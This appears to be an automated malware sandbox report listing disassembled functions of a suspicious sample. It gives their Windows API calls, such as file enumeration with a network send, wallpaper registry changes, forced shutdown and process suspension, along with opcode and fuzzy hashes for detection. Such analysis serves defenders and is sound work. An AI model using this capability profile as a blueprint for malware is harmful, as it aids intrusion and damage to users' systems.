                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: x@G$x@G
                                                  • API String ID: 4113138495-3390264752
                                                  • Opcode ID: 2e9fe5891ca909c14bddfbf6d10d3c01b0e81bea8535e51ef79ab1feb41539ab
                                                  • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                  • Opcode Fuzzy Hash: 2e9fe5891ca909c14bddfbf6d10d3c01b0e81bea8535e51ef79ab1feb41539ab
                                                  • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                  Function 020F6D29 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 020F6D44
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 020F6E0C
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNextsend
                                                  • String ID: x@G$x@G
                                                  • API String ID: 4113138495-3390264752
                                                  • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                  • Instruction ID: 6ddb9e11b1c9976eef715c7484b17cddc4472b28b422de2fbf5aaafbebdfe15f
                                                  • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                  • Instruction Fuzzy Hash: 53218B321843409FC694FB60DC90DEF77AEAF90350F400A29EB9652990EF35AA08DE52
                                                  Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                    • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                    • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: e5df99cdfa2bec7ecdd69478f77dcf55b6c35abd6d75edfc20efbd154db84599
                                                  • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                  • Opcode Fuzzy Hash: e5df99cdfa2bec7ecdd69478f77dcf55b6c35abd6d75edfc20efbd154db84599
                                                  • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                  Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                  • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                  • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                  • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                  • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                  • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                  Function 02140CE6 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02133F5A,?,?,?,?,021339B1,?,00000004), ref: 02140DC8
                                                  • _wcschr.LIBVCRUNTIME ref: 02140E58
                                                  • _wcschr.LIBVCRUNTIME ref: 02140E66
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02133F5A,00000000,0213407A), ref: 02140F09
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 2f1efdd49f250f153a7c8dca19099ac794f5d0f52f96597e3c8d2ebbc38e997e
                                                  • Instruction ID: c63ca44af7b76a16617f44879c21ca186bb869c222db89836b119af85f0a812e
                                                  • Opcode Fuzzy Hash: 2f1efdd49f250f153a7c8dca19099ac794f5d0f52f96597e3c8d2ebbc38e997e
                                                  • Instruction Fuzzy Hash: C0610772690206AED72CAB36CC41FA673A9EF4C314F14057AEA0DDB180EF75E955CB60
                                                  Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00408DAC
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 301083792-0
                                                  • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                  • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                  • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                  • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                  Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                  • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                  • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                  • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                  Function 02105B1C Relevance: 4.6, APIs: 3, Instructions: 98libraryloadershutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 02105BC2
                                                  • LoadLibraryA.KERNEL32(0046B9C0,0046B9B0), ref: 02105BD7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02105BDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressExitLibraryLoadProcWindows
                                                  • String ID:
                                                  • API String ID: 1366546845-0
                                                  • Opcode ID: 0a607b4a7b5ecc12f789a4cc2078a46f2f116dcd92e244ce5a1d878263211a66
                                                  • Instruction ID: fc47ec442e608224663d8c802067f6e61a5430eead67ed7d62060803ffe2fd67
                                                  • Opcode Fuzzy Hash: 0a607b4a7b5ecc12f789a4cc2078a46f2f116dcd92e244ce5a1d878263211a66
                                                  • Instruction Fuzzy Hash: ED21CA716C43059FCB54B7704894AFE779BAF41341F810829B60697DC1EF64C90AAF56
                                                  Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                  Function 0212A8C4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0212A9BC
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0212A9C6
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0212A9D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction ID: de0b5adbefd6ff6e775c696da2fa8ab7ee234f911b05d73504d18f0d571769e0
                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                  • Instruction Fuzzy Hash: 6B31C4759412289BCB21DF64D9887DCBBB8BF08311F5042EAF81CA7250E7749B958F45
                                                  Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                  Function 02122BA1 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00471B2C,00000000,0212282C,00000034,00471B2C,?,?), ref: 02122BB3
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,021228BE,00000000,?,00000000), ref: 02122BC9
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,021228BE,00000000,?,00000000,0210D9C7), ref: 02122BDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction ID: c34e6d48eb457865e1b27a2ea78a2e461fbebc31bc17b0f5af2e8dd255b3fbfe
                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                  • Instruction Fuzzy Hash: 5CE06D3124C220BAEB310E25BC08FAA3A949B81B71F610638FA51A40E4D77184548618
                                                  Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                  • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                  • ExitProcess.KERNEL32 ref: 0044258E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                  Function 021327BB Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002,00000000), ref: 021327DC
                                                  • TerminateProcess.KERNEL32(00000000,?,02132791,00000000,0046DAE0,0000000C,021328E8,00000000,00000002,00000000), ref: 021327E3
                                                  • ExitProcess.KERNEL32 ref: 021327F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction ID: 1b2b914b034be53edf4ee62566a45114fa4e6149a38893fc2d6791968d1b0ad5
                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                  • Instruction Fuzzy Hash: 60E0BD36044208EFCF127F65ED48A893B6AEB50382F0040B4FC499A532CB35ED82CAA4
                                                  Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                  Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                  Function 0210AF28 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0210532A,00000000), ref: 0210AF33
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0210AF40
                                                  • CloseHandle.KERNEL32(00000000,?,?,0210532A,00000000), ref: 0210AF49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction ID: 80b7b1319a614f937ce3403996fefa45400bb230185fdfe7cab7ae6af8b14261
                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                  • Instruction Fuzzy Hash: EAD09E73509231678221176A7C0D99BEE69DFC5DB37064175F509D2265DA60884186A4
                                                  Function 0210AF54 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0210534F,00000000), ref: 0210AF5F
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0210AF6C
                                                  • CloseHandle.KERNEL32(00000000,?,?,0210534F,00000000), ref: 0210AF75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction ID: 2f62c7ad173faac7eb22261a21822323b53fc409d59489b32855106a583b335d
                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                  • Instruction Fuzzy Hash: DAD09E33508221678221176A7C4D99BEDA9DFC69B37064275F505D2561DA60D84186A4
                                                  Function 020F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 47799c3eb4f41998aaec55d70cb5b8d5507aece2028a522da9ac79aad1f6e4cc
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 883168B6904709CFEB51CF99C880AAEBBFAFF08324F14404AD941A7615D771EA45CBA4
                                                  Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
